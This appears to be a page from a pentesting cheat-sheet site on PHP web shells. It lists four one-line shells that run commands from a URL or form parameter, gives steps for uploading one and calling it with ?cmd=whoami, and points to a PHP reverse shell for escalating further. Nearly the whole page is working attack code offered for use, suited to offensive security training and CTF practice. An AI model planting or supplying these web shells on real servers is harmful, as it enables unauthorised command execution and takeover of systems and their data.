๐Ÿ•ธ๏ธWebshells

PHP

One Liners

<?php echo passthru($_GET['cmd']); ?>

<?php echo exec($_POST['cmd']); ?>

<?php system($_GET['cmd']); ?>

<?php passthru($_REQUEST['cmd']); ?>

Upload the php file in the webpage and request the uploaded file using the php file path with ?cmd= parameter

http://10.0.160.56:1337/public/m.php?cmd=whoami

If the response returns server username then you can get a reverse shell using https://github.com/pentestmonkey/php-reverse-shell

REFERENCES

PreviousAuthentication BypassNextSSRF

Last updated